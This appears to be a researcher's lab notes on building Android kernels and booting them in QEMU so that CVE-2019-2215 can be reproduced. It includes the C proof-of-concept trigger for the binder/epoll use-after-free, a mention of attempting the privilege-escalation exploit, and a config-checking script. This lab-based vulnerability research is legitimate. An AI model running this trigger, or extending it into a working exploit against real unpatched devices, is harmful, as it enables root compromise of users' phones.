We are going to try all the iterations of the Android kernel in order to understand the emulator's compatibility.
To start, we will work with cloudfuzz's Android kernel, which runs Android 10 on a Pixel 2 XL.
repo init --depth=1 -u https://android.googlesource.com/kernel/manifest -b q-goldfish-android-goldfish-4.14-dev
repo sync -c --no-tags --no-clone-bundle -j$(nproc)
On QEMU it worked.
https://fadeevab.com/build-android-kernel-and-run-on-qemu-minimal-step-by-step/
android13-5.15
Pulling the common Android kernel:
make defconfig
make kvm_guest.config
wget https://storage.googleapis.com/syzkaller/wheezy.img
qemu-system-x86_64 -m 1G -kernel arch/x86/boot/bzImage -hda wheezy.img -append "root=/dev/sda" -nographic
WORKED
It worked for different branch names too.
It worked without kvm_guest.config as well.
ASB
On Ubuntu 18.04.6 LTS
Enabled CONFIG_BINDER_IPC and KASAN manually.
Manually patched the vulnerability which is mentioned here.
I commented out the green region in the kernel, and commented out a few lines around the iovec usage for exploitation.
The kernel is ASB-2019-11-05_mainline
Booted it up with QEMU as I mentioned above.
The PoC was compiled directly with gcc inside the VM, because it is an x86 kernel running on QEMU.
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

/* BINDER_THREAD_EXIT ioctl number from the binder UAPI header. */
#define BINDER_THREAD_EXIT 0x40046208ul

int main(void)
{
    int fd, epfd;
    struct epoll_event event = { .events = EPOLLIN };

    /* Open the binder device and register it with an epoll instance. */
    fd = open("/dev/binder", O_RDONLY);
    epfd = epoll_create(1000);
    epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);

    /* Frees the binder_thread while epoll still holds a pointer to its
       wait queue; on an unpatched kernel KASAN reports the use-after-free
       when epoll's cleanup at process exit touches the freed wait queue. */
    ioctl(fd, BINDER_THREAD_EXIT, NULL);
    return 0;
}
I pulled the PoC onto the machine with wget and SimpleHTTPServer.
We got the KASAN report when I ran the PoC.
I tried to run the CVE-2019-2215 LPE on QEMU and I got this.
Let's try to make it work.
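Before rebuilding for the next branch, a quick check that .config carries the options this setup relies on saves a failed boot or a missing KASAN report. This is an added example, not from the original post; it assumes the upstream Kconfig symbol names (CONFIG_ANDROID_BINDER_IPC rather than the shorthand above) and the kernel tree's own scripts/config helper, and the sample .config it writes is constructed.

```shell
#!/bin/sh
# Added example, not from the original post. Checks a kernel .config for the
# options this setup relies on: binder for the PoC, KASAN for the report, and
# the KVM guest bit that `make kvm_guest.config` turns on. Symbol names are the
# upstream Kconfig names (assumption: your tree uses the same ones).
REQUIRED_OPTIONS="CONFIG_ANDROID=y CONFIG_ANDROID_BINDER_IPC=y CONFIG_KVM_GUEST=y CONFIG_KASAN=y"

# missing_kernel_options <.config>
# Prints every required option that is absent or disabled ("# CONFIG_X is not
# set" does not match). Returns 0 when the config is complete, 1 otherwise.
missing_kernel_options() {
    config="$1"
    rc=0
    for opt in $REQUIRED_OPTIONS; do
        if ! grep -qx "$opt" "$config"; then
            echo "$opt"
            rc=1
        fi
    done
    return $rc
}

# enable_kernel_options
# Run from the kernel source root after `make defconfig`: switches each option
# on with the tree's scripts/config helper, then lets Kconfig resolve the
# dependencies (olddefconfig answers any new questions with their defaults).
enable_kernel_options() {
    for opt in $REQUIRED_OPTIONS; do
        scripts/config --enable "${opt%=y}"
    done
    make olddefconfig
}

# write_sample_config <path>
# Constructed sample of a defconfig + kvm_guest.config result where binder was
# enabled by hand but KASAN was forgotten; used to exercise the check offline.
write_sample_config() {
    cat > "$1" <<'EOF'
CONFIG_ANDROID=y
CONFIG_ANDROID_BINDER_IPC=y
CONFIG_ANDROID_BINDER_DEVICES="binder,hwbinder,vndbinder"
CONFIG_KVM_GUEST=y
# CONFIG_KASAN is not set
EOF
}

# Usage: ./check_config.sh path/to/.config
if [ $# -gt 0 ]; then
    missing_kernel_options "$1"
fi
```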
Side note:
I couldn't emulate any Android kernel with its Android configs. I can enable binder manually, but other parts of the environment have requirements that QEMU cannot supply. For this reason, if you are working on a specific device's kernel or a specific config file, you have to have the device or a customized QEMU, which could be the emulator or cuttlefish. In that case, we have a few public sources:
https://sites.google.com/junsun.net/how-to-run-cuttlefish/home